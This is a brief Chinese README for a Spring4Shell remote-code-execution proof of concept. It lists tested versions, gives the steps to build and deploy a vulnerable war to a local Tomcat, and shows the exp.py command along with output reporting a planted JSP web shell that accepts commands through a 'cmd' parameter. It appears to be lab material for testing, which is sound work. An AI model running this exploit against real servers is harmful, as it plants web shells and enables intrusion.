漏洞描述:https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
POC 构建:https://github.com/BobTheShoplifter/Spring4Shell-POC
已在 JDK 11.0.14、Spring Boot 2.6.5 和 Apache Tomcat 9.0.60 上测试通过
mvn clean package 构建应用程序demo-0.0.1-SNAPSHOT.war 重命名为 spring-poc.war,并将此 .war 文件复制到 Tomcat 的 webapps 目录下python exp.py --url http://localhost:8080/spring-poc/greeting
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoamitomcatwar.jsp 被写入 Tomcat 的 webapps/spring-poc 目录。可通过修改 exp.py 更改此目录。

